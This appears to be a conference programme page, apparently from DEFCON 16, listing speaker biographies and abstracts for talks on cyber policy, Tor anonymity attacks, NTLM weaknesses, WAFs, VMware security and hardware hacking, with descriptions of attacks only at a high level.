Mr. Hopper retired with nearly thirty years service with the Arizona Department of Public Safety and thirty seven years in Law Enforcement. Mr. Hopper's Law Enforcement career included assignments in Narcotics, Air Smuggling, White Collar Crime and Organized Crime. Mr. Hopper also developed and managed the Arizona DPS Regional Computer Forensic Lab. This computer forensic lab grew from a two man unit in 1998 to a state of the art computer forensic lab that, in 2005 when he retired, had grown to seven state, local and federal agencies and nearly twenty five computer forensic examiners.


Michael J. Jacobs, SRA International, Inc.
Michael Jacobs joined SRA in October 2002 as a Senior Advisor following his retirement from the Federal Government after 38 years of service. In March 2003 he was appointed Director of SRA's Cyber and National Security Program. Prior to SRA, Mr. Jacobs was the Information Assurance (IA) Director at the National Security Agency (NSA). Under his leadership, NSA began implementing an Information Assurance strategy to protect the Defense Information Infrastructure and as appropriate, the National Information Infrastructure. He was responsible for overseeing the evolution of security products, services, and operations to ensure that the Federal Government's national security information was free-flowing, unobstructed and uncorrupted.

Mr. Jacobs had a long and distinguished career at the National Security Agency where he served in key management positions in both the Intelligence and IA mission areas. He served as the Deputy Associate Director for Operations, Military Support where he was responsible for developing a single, coherent military support strategy for NSA. During his 38 years of NSA service, Jacobs was a leader in Information Systems Security production and control, policy and doctrine and customer relations. He has testified before Congress on defense issues and has spoken widely on topics ranging from IA to cultural diversity. For his vision, dedication, and accomplishments, he has been recognized by the Department of Defense with the Distinguished Civilian Service Medal; by the Director Central Intelligence with the Intelligence Community's Distinguished Service Award; and by NSA with the Exceptional Civilian Service Award. In addition, he has been awarded the National Intelligence Medal of Achievement and was twice awarded the Presidential Rank Award for Meritorious Achievement.

He earned his B.S. degree in Business Administration from King's College and completed the Senior Managers in Government Program at Harvard University's Kennedy School.

Mr. Jacobs resides in College Park, Maryland with his wife Ethel and their five children. From 1997 through 2001 he served as the City's elected Mayor following fourteen years as an elected member of the City Council.


Timothy Kosiba, FBI
Timothy Kosiba has been a Forensic Examiner with the FBI CART Program for 12 years, and managing the CART-BWI Laboratory in Linthicum, Maryland for the last 6 years. Mr. Kosiba has a B.S. in Management Information Systems from the University of Baltimore, and M.S. in Forensic Science from George Washington University. Currently, he is also the Program Manager for the Forensic Networks Program within CART, and is responsible for managing the deployment of 25 Storage Area Networks around the country, for use in examining and reviewing digital evidence. Mr. Kosiba is also a Certified ASCLD/LAB Inspector in the discipline of Digital Forensics.


Robert F. Lentz, OSD
Mr. Lentz is the Director for Information Assurance (IA) in the Office of the Assistant Secretary of Defense, Networks and Information Integration/Chief Information Officer. He is the Chief Information Assurance Officer (CIAO) for the Department of Defense (DoD) and oversees the Defense-wide IA Program, which plans, monitors, coordinates, and integrates IA activities across DoD. Mr. Lentz is also the Chairman of the National Space INFOSEC Steering Council (NSISC), a member of the Presidential Sub-Committee on National Security Systems (CNSS), the Manager of the DoD IA Steering Council, and the IA Domain Owner of the Global Information Grid Enterprise Information Management Mission Area. In his capacity of IA Domain Owner, Mr. Lentz is a member of the DoD CIO Executive Council. He also reports to the Deputy Undersecretary for Security and Counter-Intelligence and is a member of the Information Operations (IO) Steering Council. Mr. Lentz represents DoD on several private sector boards, including the Center for Internet Security (CIS) Strategic Advisory Council, the Common Vulnerabilities & Exposures (CVE) Senior Advisory Council, and the Federal Electronic Commerce Coalition (FECC).

Mr. Lentz has over 26 years of experience with the National Security Agency (NSA) in the areas of financial management and technical program management. He has served as Chief of the Space and Networks IA Office, Chief Financial Officer of the NSA IA Directorate, Executive Assistant to the NSA SIGINT Collections and Operations Group and Field Chief of the Finksburg National Public Key Infrastructure / Key Management Infrastructure Operations Center. He has also served on several strategic planning and acquisition reform panels. Mr. Lentz has received the NSA Resource Manager of the Year Award, the Defense Meritorious Service Award, the 2003 Presidential Rank Award and the 2004 "Federal 100" award. In2004, Mr. Lentz also received the highest-level honorary award the Department can bestow on a civilian employee, the prestigious Secretary of Defense Distinguished Civilian Service Award. Mr. Lentz is a graduate of the National Senior Cryptologic Course at the National Cryptologic School, Federal Executive Institute (FEI) and the Resource Management Course at the Naval Postgraduate School. He earned a Bachelor of Science Degree with a double major in History and Political Science from Saint Mary's College of Maryland and a Masters Degree in National Security Strategy from the National War College. While attending the National War College in 1999, Mr. Lentz's primary focus was on Homeland Security.


Richard Marshal, NSA
Mr. Richard H. L. Marshall is the Senior Information Assurance (IA) Representative, Office of Legislative Affairs at the National Security Agency (NSA). NSA's Legislative Affairs Office is the Agency's point of contact for all NSA matters concerning Congress and is committed to maintaining a relationship with Congress built on trust, candor, completeness, correctness, consistency, and corporateness. Mr. Marshall has been instrumental in framing critical appreciation by key Senators and Representatives on Information Assurance and its impact on helping to protect the nation's critical infrastructures. As an additional duty, Mr. Marshall also represents NSA in the National Centers of Academic Excellence in Information Assurance Program in Boston, Massachusetts and the Detroit, Michigan areas where he led the effort to establish an International Consortium on Information Assurance.

Mr. Marshall was selected by Dick Clarke, the Cyber Advisor to the President to serve as the Principal Deputy Director, Critical Infrastructure Assurance Office (CIAO), Bureau of Industry and Security, Department of Commerce where he led a team of 40 dedicated professionals in coordinating and implementing the Administration's National Security for Critical Infrastructure Protection initiative to address potential threats to the nation's critical infrastructures. He persuasively articulated the business case for enhancing information assurance in government and private sectors, and championed national outreach and awareness of information assurance issues to key stakeholders such as owners and operators of critical infrastructures, opinion influencers, business leaders, and government officials.

Before being nominated by the DIRNSA and approved by the SECDEF to serve in an Executive Development assignment to help lead the CIAO, Mr. Marshall served with distinction as the Associate General Counsel for Information Systems Security/Information Assurance, Office of the General Counsel, National Security Agency for over eight years. In that capacity, Mr. Marshall provided advice and counsel on national security telecommunications and technology transfer policies and programs, the National Information Assurance Partnership, the Common Criteria Mutual Recognition Arrangement, legislative initiatives and international law. Mr. Marshall was the legal architect for the Joint Chiefs of Staff directed exercise "Eligible Receiver 97" that spotlighted many of the cyber-vulnerabilities of our nation's critical infrastructures and helped bring focus on this issue at the national leadership level.

Mr. Marshall graduated from The Citadel with a B.A. in Political Science; Creighton University School of Law with a J.D. in Jurisprudence; Georgetown School of Law with an LL.M. in International and Comparative Law; was a Fellow at the National Security Law Institute, University of Virginia School of Law in National Security Law; attended the Harvard School of Law Summer Program for Lawyers; the Georgetown University Government Affairs Institute on Advanced Legislative Strategies and participated in the Information Society Project at Yale Law School and in the Privacy, Security and Technology in the 21st Century program at Georgetown University School of Law.


Ken Privette, USPS
Ken works as the Special Agent in Charge of the Computer Crimes Unit (CCU) at the United States Postal Service Office of Inspector General. His Unit conducts computer crime investigations and provides computer forensics support to a force of over 650 agents who conduct fraud and internal crime investigations for the U. S. Postal Service. Over the past two years Ken's team has doubled in size, now managing a computer forensics workload of more than 900 requests per year.

Ken spent much of his professional life as a Special Agent with the Naval Criminal Investigative Service both overseas and state-side where he conducted investigations involving computer crime, terrorism, and counterintelligence matters.


Keith Rhodes, GSA
Keith Rhodes is currently the Chief Technologist of the U. S. Government Accountability Office and Director of the Center for Technology & Engineering. He provides assistance throughout the Legislative Branch on computer and telecommunications issues and leads reviews requiring significant technical expertise. He has been the senior advisor on a range of assignments covering continuity of government & operations, export control, computer security & privacy, e-commerce & e-government, voting systems, and various unconventional weapons systems. He has served as a Commissioner on the Independent Review of the National Imagery and Mapping Agency. Before joining GAO, he was a supervisory scientist at the Lawrence Livermore National Laboratory. His other work experience includes computer and telecommunications projects at Northrop Corporation and Ohio State.

Linton Wells II, Principal Deputy Assistant Secretary of Defense, Networks and Information Integration
Dr. Linton Wells II serves as the Principal Deputy Assistant Secretary of Defense (Networks and Information Integration). He resumed these duties on November 14, 2005 after serving as the Acting Assistant Secretary and DoD Chief Information Officer from March 8, 2004. He became the Principal Deputy Assistant Secretary of Defense (Command, Control, Communications and Intelligence) on August 20, 1998 which became Networks and Information Integration in 2003. Prior to this assignment, he had served in the Office of the Under Secretary of Defense (Policy) from 1991 to 1998, most recently as the Deputy Under Secretary of Defense (Policy Support).

In twenty-six years of naval service, Dr. Wells served in a variety of surface ships, including command of a destroyer squadron and guided missile destroyer. In addition, he acquired a wide range of experience in operations analysis; Pacific, Indian Ocean and Middle East affairs; C3I; and special access program oversight.

Dr. Wells was born in Luanda, Angola, in 1946. He was graduated from the United States Naval Academy in 1967 and holds a Bachelor of Science degree in physics and oceanography. He attended graduate school at The Johns Hopkins University, receiving a Master of Science in Engineering degree in mathematical sciences and a PhD in international relations. He is also a 1983 graduate of the Japanese National Institute for Defense Studies in Tokyo, the first U.S. naval officer to attend there.

Dr. Wells has written widely on security studies in English and Japanese journals. He co-authored Japanese Cruisers of the Pacific War, which was published in 1997. His hobbies include history, the relationship between policy and technology, scuba diving, and flying.

Top of page

Panel: Commission on Cyber Security for the 44th Presidency


Michael J. Assante
Idaho National Lab (INL)
Jerry Dixon
Director of Analysis, Team Cymru
Tom Kellermann
CISM, VP of Security Awareness, Core Security Technologies
Marcus Sachs
Executive Director of Government Affairs for National Security Policy, Verizon

The Center for Strategic and International Studies (CSIS) has established a Commission on Cyber Security for the 44th Presidency - the administration that will take office in January 2009. The goal of the nonpartisan Commission is to develop recommendations for a comprehensive strategy to improve cyber security in federal systems and in critical infrastructure. Hear what is going on with this Commission, ask questions, and provide input on what you think should be addressed at a Presidential level for the next administration.

Michael J. Assante, a recognized security and infrastructure protection visionary and new product development leader, brings a powerful combination of leadership/domain experience, technological vision and strategy development to the Idaho National Lab (INL). Selected by his peers as the winner of the Information Security Magazine’s 2007 security 7 leadership award for his efforts as a “strategic thinker”.

Prior to assuming his strategic leadership position at INL, Mr. Assante was a vice president and Chief Security Officer at American Electric Power, the largest generator of electric power in the US, serving 5 million customers in eleven states. He provided leadership, developed and implemented strategies to enhance security and business continuity for AEP; he was also responsible for protecting and maintaining corporate facilities, critical operating assets and property; and ensured the security and continued preservation of all corporate information and proprietary data and the technology that supports it. Selected for outstanding contribution at the RSA 2005 Conference and awarded the outstanding achievement in the practice of security within an organization. He has been recognized by SC Magazine among all Chief Security Officers as one of two finalists for the global 2005 awards as CSO of the year. He was selected as a finalist for Information Security Executive of the Year of the Midwest in 2005. In 2003, Mr. Assante was awarded best governance program “The Best of the Best – Best Governance Program,” Information Security Magazine, December 2003 for the establishment of an enterprise executive security committee.

Prior to assuming a vice president’s position as Chief Security Officer at AEP, Mr. Assante as a reserve naval intelligence officer was filling a critical position at the National Infrastructure Protection Center. In 1997, Mr.Assante was named as a Naval Intelligence Officer of the Year. In 2002 Assante was selected as one of Columbus Ohio’s Top 40 people under 40.

Jerry Dixon is currently the Director of Analysis for Team Cymru and serving as Infragard's Vice President for Government Relations, and was the former Executive Director of the National Cyber Security Division (NCSD) & US-CERT, of the Department of Homeland Security. He currently serves as a member of the CSIS Cyber-Commission on Cyber-Security for the 44th President and a member of the Advisory Board for Debix, an Identity Theft Protection Company.

During his time at Homeland, Jerry led the national effort to protect America's cyber infrastructure and identify cyber threats. Prior to being chosen to lead NCSD, Mr. Dixon served as the Deputy Director of Operations for the U.S. Computer Emergency Readiness Team (US-CERT). Mr. Dixon was instrumental in creating US-CERT, which serves America as the 24x7x365 cyber watch, warning, and incident response center that protects the cyber infrastructure by coordinating defense against and response to cyber attacks. Mr. Dixon led the initial development of US-CERT's capabilities for analyzing and reducing cyber threats and vulnerabilities, disseminating cyber threat warning information, and coordinating incident response activities across federal, state, local government agencies, and private sector organizations, making it Homeland Security's primary element of cyber preparedness and response.

Before joining NCSD, Mr. Dixon was the founding director of the Internal Revenue Service's (IRS) Computer Security Incident Response Capability. In this role, Mr. Dixon led their operational cyber security capability for the IRS and developed their ability to detect and respond to protect American taxpayer's private information from security attacks. Mr. Dixon has also served as Director of Information Security for Marriott International, a global private sector company, where he led cyber security planning, security architecture, and security operations.

Tom Kellermann is responsible for building Core's relationships with key industry and government partners, and helping further the acceptance of auditing security defenses to reduce organizations' operational risk.

Additionally, Kellermann represents Core at US, international and industry security working groups, helping these organizations promote improved security practices and policies. Specifically, Tom is a Commissioner and Chair of the Threats Working Group on The Commission on Cyber Security for the 44th Presidency. Tom also serves as the Chair of the Technology Working Group for the Financial Coalition Against Child Pornography.

Tom Kellermann formerly held the position of Senior Data Risk Management Specialist the World Bank Treasury Security Team. Tom was responsible for Cyber-intelligence and policy management within the World Bank Treasury.

Tom regularly advised central banks around the world per their cyber-risk posture and layered security architectures.

Along with Thomas Glaessner and Valerie McNevin, he co-authored the book E-safety and Soundness: Securing Finance in a New Age and the White Paper, and E-security: Risk Mitigation in Financial Transactions. Tom is also the author of numerous World Bank white papers on cyber security: Mobile Risk Management, The Digital Insider, Phishing in Digital Streams, Bots: Cyber Parasites, Zero Day, and Money Laundering in Cyberspace. See:

http://www.worldbank.org/finance/esecurity

Tom is an active member of the IP Governance Task Force, The National Consumer League's Anti-Phishing Working Group, The New York Chapter of Infragard, the IPv6 Forum and is an active member of the American Bar Association's working group on Cyber-crime. Tom is a Certified Information Security Manager (CISM).

Marcus Sachs is a member of the CSIS Commission on Cyber Security for the 44th Presidency and since 2003 has volunteered as the director of the SANS Internet Storm Center. He is a retired US Army officer, a former Presidential appointee to the staff of the National Security Council, and was part of the original cadre of DHS' National Cyber Security Division in 2003. He currently works at Verizon as an Executive Director of Government Affairs for National Security Policy. Prior to joining Verizon in 2007 he was the deputy director of SRI International's Computer Science Laboratory.

Top of page

de-Tor-iorate Anonymity


Nathan Evans
Ph.D Student, University of Denver
Christian Grothoff

Feel safe and comfortable browsing the Internet with impunity because you are using Tor? Feel safe no more! We present an attack on the Tor network that means that the bad guys could find out where you are going on the Internet while using Tor. This presentation goes over the design decisions that have made this attack possible, as well as show results from a Tor network that reveals the paths that data travels when using Tor. This method can make using the Tor network no more secure than using a simple open web proxy. We go over the attack in detail, as well as possible solutions for future versions of Tor.

Nathan Evans is a Ph.D student and the University of Denver working in the areas of security, privacy, anonymity, and performance in P2P networks. While he seems to be running around trying to break all the networks his intentions are to improve the current state of affairs wrt security. Previous work includes Routing in the Dark: Pitch Black (presented at Defcon 15) and work on evaluating various P2P systems published in the German magazine IX.

Christian Grothoff is an assistant professor of computer science at the University of Denver. He earned his PhD in computer science from UCLA in expressive type systems for object-oriented languages. His research interests include compilers, programming languages, software engineering, networking and security. He also is the primary author and maintainer of GNUnet, GNU's peer-to-peer framework.

Top of page

Hacking the Bionic Man


Gadi Evron

Science fiction or security in 2040?

In this lecture we will discuss how security issues may impact the future, which may be confused with science fiction.

Already today we find cyber-implants of different kinds embedded within the human machine. As security professionals we know there is no such things as perfect code, and security solutions are far from perfect. What will we be facing in 2040, and how might we defend ourselves - if at all.

Gadi Evron is recognized globally for his work and leadership in Internet security operations. He is the founder of the Zeroday Emergency Response Team (ZERT), organizes and chairs worldwide conferences, working groups and task forces. He is considered an expert on corporate security and counterespionage, botnets, e-fraud and phishing. Previously, Gadi was CISO at the Israeli government ISP (eGovernment project) and founded the Israeli Government CERT. Gadi authored two books on information security and is a frequent lecturer.

Top of page

Identification Card Security: Past, Present, Future


Doug Farre
Administrative Director, Locksport International

Come learn how identification cards have taken over our lives, how they can be manufactured at home, and how you can start a legal ID making business. Come learn all the tips and tricks about amateur id manufacturing and pickup the first ever Complete Amateur ID Making Guide. Also, come test your ability to spot a fake, vs. a real, and check out the newest in ID technology. Polycarbonate laminates, biometrics, Teslin, and RFID. Lastly, see how corporations are affecting the identification card fiasco in the U.S. What's in your wallet?

Doug Farre is the Administrative Director of Locksport International, President of the Longhorn Lockpicking Club, and Editor in Chief of Non Destructive Entry Magazine. Doug is interested in all types of security and is currently a Geophysics student at the University of Texas at Austin. He teaches scuba diving in his free time.

Top of page

Snort Plug-in Development: Teaching an Old Pig New Tricks


Ben Feinstein
Security Researcher, SecureWorks Counter Threat Unit

Snort has become a standard component of many IT security environments. Snort is mature and widely deployed, and is no longer viewed as new or exciting by the industry. However, with such widespread deployment, enhancing Snort’s capabilities offers the potential for a large and immediate impact. Instead of chasing the industry’s new-hotness of the day, it frequently makes more sense to add new capabilities to an existing security control.

With this in mind, the author set out to implement new and innovative capabilities in the form of GPL-licensed Snort plug-ins. The author will introduce the Snort plug-in architecture and the relevant APIs used when implementing extensions to Snort. Lessons learned and pitfalls to avoid when developing Snort plug-ins will be covered. Some interesting code snippets will be discussed. Ideas for future work in the area of Snort extensions will be presented.

Ben Feinstein is a researcher on the Counter Threat Unit (CTU) at SecureWorks, working behind the scenes to support Agent Jack Bauer and the GWOT. He first became involved with information security in 2000 while working on a DARPA / USAF contract instead of going to his college classes. Since then, Ben has worked designing and implementing security-related software and appliances at a series of since acquired or failed start-ups. In his spare time Ben authored RFC 4765 and RFC 4767. His experience is in the areas of IDS/IPS, digital forensics, next-gen firewall systems, log analysis and viz, secure messaging, security appliances, small caliber arms and right-wing rhetoric. Ben has presented at Black Hat USA, DEFCON, ACSAC and others.

Top of page

The Wide World of WAFs


Ben Feinstein
Security Researcher, SecureWorks Counter Threat Unit

With webapp protection now mandated by the PCI standard, web-application firewalls (WAFs) have received newfound interest from both consumers of security technologies, as well as from security researchers and potential attackers. Now that WAFs are a PCI-approved substitute for code reviews, expect many vendors to opt for this potentially less costly route to compliance. Of course, security researchers and potential attacks will increasingly train their sights on this lucrative and expanding target.

This talk will explore the ModSecurity Apache module and how it is being used as a WAF to meet the PCI 6.6 webapp protection requirement. The relative strengths and weaknesses of WAFs in general and ModSecurity in particular will be highlighted. Common deployment scenarios will be discussed, including both in-the-cloud, stand-alone and Apache server embedded deployments. The ModSecurity rules language will be covered and several ModSecurity Core Rules that are representative of its capabilities will be dissected in depth. Finally, some interesting uses of ModSecurity's content injection capabilities will be discussed. Anyone up for hacking the hacker via scripting injected into your webapp's response to an attempted attack? This talk will show you how!

Ben Feinstein is a researcher on the Counter Threat Unit (CTU) at SecureWorks, working behind the scenes to support Agent Jack Bauer and the GWOT. He first became involved with information security in 2000 while working on a DARPA / USAF contract instead of going to his college classes. Since then, Ben has worked designing and implementing security-related software and appliances at a series of since acquired or failed start-ups. In his spare time Ben authored RFC 4765 and RFC 4767. His experience is in the areas of IDS/IPS, digital forensics, next-gen firewall systems, log analysis and viz, secure messaging, security appliances, small caliber arms and right-wing rhetoric. Ben has presented at Black Hat USA, DEFCON, ACSAC and others.

Top of page

VLANs Layer 2 Attacks: Their Relevance and their Kryptonite


Kevin Figueroa
CEO & Information Security Engineer, K&T International Consulting, Inc.
Marco Figueroa
CEO & Senior Security Analyst, MAF Consulting, Inc.
Anthony L. Williams
CEO & Information Security Architect, IRON::Guard Security, LLC

Proper network infrastructure configuration is a crucial step in a successful defense in depth strategy for any organization. The fact that the network fabric is susceptible to these attacks years after their initial discovery is alarming and disgusting at the same time. We propose to revisit these attacks using contemporary techniques and tools and also offer equally contemporary solutions to mitigate or foil these malicious networks attacks as the case may be. Networking professionals will be able to walk away from this presentation with solid remedies to these issues with a reinforcement that they actually still exist and are pertinent to a network security strategy that will function now and in the future.

Kevin Figueroa is CEO and Information Security Engineer for K & T International Consulting, Inc providing a spectrum of services like security analysis, penetration testing, compliance audit, wireless security assessment, and reverse engineering analysis. Over the last 10 years he has developed security skills which has lead him to various employment opportunities like, CitiGroup, and CNN/money. He holds the following certifications: A+, Network +, Security +, CEH Contact him at kfigueroa@kandtcorp.com or http://www.ktinternationalconsulting.com

Marco Figueroa is the CEO and Senior Security Analyst with MAF Consulting Inc, a New York City information security consulting firm. Marco's expertise includes reverse engineering malware, incident handling, hacker attacks and defenses. He has performed numerous security assessments, and responded to computer attacks for clients in market verticals. Marco holds the following certifications: CEH, GCIH, GREM, Security+, Network+, A+. Contact him at Marco.figueroa@mafcorp.net http://www.mafcorp.net.

Anthony L. Williams is the CEO and Information Security Architect for IRON::Guard Security, LLC where he performs penetration testing, vulnerability assessments, audits and incident response. His experience as an information security professional with over 13 years of IT experience include proficiency in regulatory environments including Sarbanes-Oxley and the Health Insurance Portability and Accountability Act with an extensive background in IT audits using ISO/BS 17799 and COBIT. Anthony is a member of the FBI Infragard, Information Systems Security Association and Information Systems Audit and Control Association.

Top of page

Virtually Hacking


John Fitzpatrick
Information Security Consultant - MWR InfoSecurity

Own the VMware box and you get half the servers on the network for free. Although, depending on the VMware server's configuration, whether you want to be stealthy about it and whether you want to avoid any disruption it may not always be quite that simple. During this talk we will take a look at ways of jumping from a server to guest OS without causing any disruption and also some tools for assessing the security posture of VMware products.

With VMware becoming an integral part of many networks it is important that the security level of its deployment is assessed appropriately. Without the right tools to do the job this can be a slow and painful task; with the right tools you can have a lot of fun. I'll demo some tools which I have been working on that harness the power of dradis and make testing and possibly owning VMware servers and VMs a virtually painless task.

John Fitzpatrick is an information security consultant working in the UK for MWR InfoSecurity performing penetration and application tests. His primary interests are in searching for security issues in anything that might make a network a playground and in writing code that does fun things. John is always researching some protocol, software or technology, generally with the goal of breaking it or finding a new interesting attack vector; most recently this research has been targeted towards VMWare. He is also highly experienced in a technique which enables him to code all night and still turn up to work in the mornings.

Top of page

Is that a unique credential in your pocket or are you just pleased to see me?


Zac Franken
Security Researcher

This year new shiny toys are abound, as I'll tell you about the credentials in your wallet, and even in you. How secure (or not) they are and a few ways to duplicate / replicate /emulate them.

Last year at Defcon 15 I had a bit of a chat with you guys and gave you an overview of access control systems, told you of their common flaw, and showed you some cool toys that exploit it. This year, from the humble magnetic stripe card to the modern hand geometry scanner, I will take you through some simple (and not so simple) ways to get in, so you can try and keep them out.

Physical access control systems are shockingly vulnerable. As far as I am concerned most have the security equivalence of a "Please keep off the grass" sign.

Take that "Please keep off the grass" sign, add poor implementation, bad products, and a security industry that charges extra for any security whatsoever, poor locks that are pickable/bumpable, add accountants that nickel and dime their organization's security budget (because it doesn't have to be secure, it just has to enable them to tick a box in their corporate filings), and you end up with a sign that says "eep ass" which only delays an intruder in as much, as they briefly stop to ponder WTF you meant by the sign in the first place.

Why are you here? Why aren't you at home on the porch with a shotgun protecting your property?!

Wait a minute...... Why am I here?!

Zac Franken is an independent security researcher based in London, currently looking at physical access control systems. When he is not speaking at Defcon, he is running Defcon operations, I.E. losing his mind because of YOU! Or speaking at other security conferences around the world.

Top of page

Exploiting A Hundred-Million Hosts Before Brunch


Stefan Frei
Security Researcher
Thomas Duebendorfer
Security Researcher
Gunter Ollmann
Security Researcher
Martin May
Security Researcher

If you were to "hack the planet" how many hosts do you think you could compromise through a single vulnerable application technology? A million? A hundred-million? A billion? What kind of application is so ubiquitous that it would enable someone to launch a planet-wide attack? - why, the Web browser of course! We've all seen and studied one side of the problem - the mass- defacements and iframe injections. But how many vulnerable Web browsers are really out there? How fast are they being patched? Who's winning the patching race? Who's the tortoise and who's the hare? Our latest global study of Web browser use (tapping in to Google's massive data repositories) has revealed some startling answers along with a new perspective on just how easy it would be to "hack the planet" if you really felt like it.

Paper Download and Contact
--------------------------
W: http://www.techzoom.net/insecurity-iceberg
M: insecurity-iceberg@ee.ethz.ch

Stefan Frei refines and exercises his pentesting, consulting, and security research skills daily, for more than a decade. After several years with the ISS X-Force, he decided to go for a PhD to combine academic research with his experience gained in the field. His research interests are the vulnerability ecosystem, security econometrics, and networking security. As a licensed helicopter and fixed wing aerobatic pilot he is used to look ahead and think out of the box. He is a frequent contributor to security conferences, such as BlackHat or FIRST.

Thomas Duebendorfer works on the security of Google's online ad system as a software engineer tech lead at Google Switzerland GmbH in Zurich. He is currently the president of the Information Security Society Switzerland ISSS and also a lecturer at ETH Zurich, the Swiss Federal Institute of Technology. He has earned a Ph.D. and a M.S. degree with honors with distinction from ETH Zurich.

Gunter Ollmann has been paid to break in to the largest and best known organizations around the world for the last decade, led some of the world's best known penetration testing teams and most respected security R&D divisions and, when not writing yet another whitepaper or blogging on security, he's crystal-balling the threats and countermeasures for three-years hence. Google Search is a wonderful thing, and with a name as unique as his, there's nowhere to hide.

Martin May received the Master degree in computer science from the University of Mannheim in 1996. In 1999, he received his Ph.D. degree at INRIA Sophia Antipolis. During his PhD, he was also technical staff member of Lucent Bell-Labs Research, Holmdel, USA and Sprintlabs, Burlingame, USA where he continued his research. Early 2000, he founded a start up company in France where he worked in the field of Content Networking and sold it end of 2003. Since then, he is senior research associate at the Swiss Institute of Technology in Zurich (ETH Zurich). His research interests are in future Internet architectures and network security. Dr. May chaired multiple workshops and conferences on network security and also served on technical Program committees for many networking conferences.

Top of page

Nmap: Scanning the Internet


Fyodor
Hacker, Insecure.Org

The Nmap Security Scanner was built to efficiently scan large networks, but Nmap's author Fyodor has taken this to a new level by scanning millions of Internet hosts as part of the Worldscan project. He will present the most interesting findings and empirical statistics from these scans, along with practical advice for improving your own scan performance. Additional topics include detecting and subverting firewall and intrusion detection systems, dealing with quirky network configurations, and advanced host discovery and port scanning techniques. A quick overview of new Nmap features will also be provided.

Fyodor authored the open source Nmap Security Scanner in 1997 and continues to coordinate its development. He also maintains the Insecure.Org, Nmap.Org, SecLists.Org, and SecTools.Org security resource sites and has authored seminal papers on stealth port scanning, remote operating system detection, version detection, and the IPID Idle Scan. He is a founding member of the Honeynet project and co-author of the books "Know Your Enemy: Honeynets" and "Stealing the Network: How to Own a Continent". His newest book, Nmap Network Scanning, is due for release this year. Fyodor is President of Computer Professionals for Social Responsibility (CPSR), which has been promoting free speech, privacy, and useful technology since 1981. Fyodor loves Defcon, and has been attending for more than a decade. He previously presented at Defcon in 1998, 2002, and 2005.

Top of page

Journey to the center of the HP28


Travis Goodspeed
Security Researcher

In 1990, a wire-bound book was published in Paris by the title of <<Voyage au centre de la HP28 c/s>>. It presents a very thorough account of the inner workings of the Hewlett Packard 28 series of graphing calculators. Designed before the days of prepackaged microprocessors, the series uses the Saturn architecture, which HP designed in-house. This architecture is very different from today's homogeneous RISC chips, with registers of 1, 4, 12, 16, 20, and 64 bits in width. The fundamental unit of addressing is the nibble, rather than the byte. Floats are represented as binary-coded decimal, and a fundamental object in the operating system is an algebraic expression.

This architecture is still used, albeit in emulation, in the modern HP50g. With this talk, I intend to call attention to a fascinating, professional, and well-documented feat of reverse engineering. Using little more than their ingenuity and an Apple ][e, Paul Courbis and Sebastien Lalande reverse engineered a black box calculator into a real computer, one which became user-programmable in machine language as a result. More than that, they documented the hack in such exquisite detail that their book is not just a fascinating read, but also veritable holy scripture for anyone trying to write custom software for this machine.

Expect a thorough review, in English, of the contents of the book. This is not a sales pitch; electronic copies of both the translation and the original are free to all interested readers. Topics include the datatypes of the computer algebra system, hacking an upgrade into the memory bus, bootstrapping an assembler, writing in machine language by tables, and adding an I/O port for software backups.

Travis Goodspeed works at the Extreme Measurement Communications Center of the DOE's Oak Ridge National Laboratory. He has spoken at ToorCon 9 and the Texas Instruments Developer's Conference regarding stack overflow exploits for the MSP430-based Wireless Sensor Networks. Having demonstrated that such attacks are possible, his present research is aimed at porting defense techniques, such as ASLR and code-auditing, to this platform. For the past year, he has been translating <<Voyage au centre de la HP28 c/s>>, a fascinating work of francophone reverse engineering, into English.

Top of page

Making the DEFCON 16 Badge


Joe "Kingpin" Grand

For the third year in a row, Kingpin has had the honor of designing the DEFCON Badge. No longer just a boring piece of passive material, the badge is now a full-featured, active electronic product. If you're up early enough and interested in details of the entire development process of the badge, from initial concept drawings to prototype electronics to completed units, and want to hear stories of the trials and tribulations that come with designing and manufacturing, be sure to come to this talk.

Joe "Kingpin" Grand Kingpin is an electrical engineer, hardware hacker, and former member of L0pht Heavy Industries. Even with his distrust of big business, he has become a co-host of an upcoming engineering build show, Prototype This, for Discovery Channel. Sometimes he uses his real name, Joe Grand, and invents things for his company, Grand Idea Studio (www.grandideastudio.com). He's also the sole proprietor of Kingpin Empire, a hacker-inspired merchandise outfit (www.kingpinempire.com) that gives back to the community through charitable donations. He's designed the badge for DEFCON a few times, too.

Top of page

BSODomizer


Joe "Kingpin" Grand

Zoz
Robotics Engineer

We like hardware and we like messing with people. BSODomizer lets us do both. BSODomizer is a small propeller-based electronic device that interfaces between a VGA output device (laptop or desktop) and VGA monitor and will flash images at random time intervals. (Surprise Goatse!) Or display your favorite BSOD causing the confused user to turn off their machine over and over again. Customization for different modes are configurable via on-board DIP switches.

We'll bring you through the entire design and development process of the device and end with some never-before-seen footage of poor bastards taking the bait. Full schematics, firmware, circuit board layout, and bill of materials will be released, so you can build your own BSODomizer. We'll have some bare PCB's and parts available for your instant gratification.

Don't let the name fool you. BSODomizer will do everything you've always wanted to do to your enemies (or friends) without the messy cleanup.

Joe "Kingpin" Grand Kingpin is an electrical engineer, hardware hacker, and former member of L0pht Heavy Industries. Even with his distrust of big business, he has become a co-host of an upcoming engineering build show, Prototype This, for Discovery Channel. Sometimes he uses his real name, Joe Grand, and invents things for his company, Grand Idea Studio (www.grandideastudio.com). He's also the sole proprietor of Kingpin Empire, a hacker-inspired merchandise outfit (www.kingpinempire.com) that gives back to the community through charitable donations. He's designed the badge for DEFCON a few times, too.

Zoz is a robotics engineer, software hacker, pyrochemist and inveterate tinkerer. He got his PhD from the MIT Media Lab primarily so he could say "Trust me, I'm a doctor". After years in academia his love of media whoring could be held back no longer, so he is presently engaged in selling out by co-hosting Prototype This! for the Discovery Channel. He invents things for his own amusement, giving them designations like Funkenschnorkel, Luftwerfer and Schallfaust, and rarely associates his real name with anything.

Top of page

Nail the Coffin Shut, NTLM is Dead


Kurt Grutzmacher
Security Researcher

Ever since SirDystic's SMBRelay release the weaknesses of the NTLM protocol have been repeatedly shown. For over twenty years this protocol has been refined by Microsoft, it's time to let it go and stop supporting it within our networks.

This presentation will trace the history of the NTLM protocol and the various attacks that have befallen it over the past decade, the attempts at fixing them and why these fixes have not succeeded. I will show what I believe is the most significant attack to it and why the best solution is to migrate away from NTLM once and for all. Attendees will come away with a stronger understanding of the NTLM protocol and information to help them make the case to their Windows administrators, CIOs, CSOs and everybody else that there is a serious risk in keeping NTLM support around. A toolkit using the Metasploit Framework will be released that will help you show the risks in your enterprise.

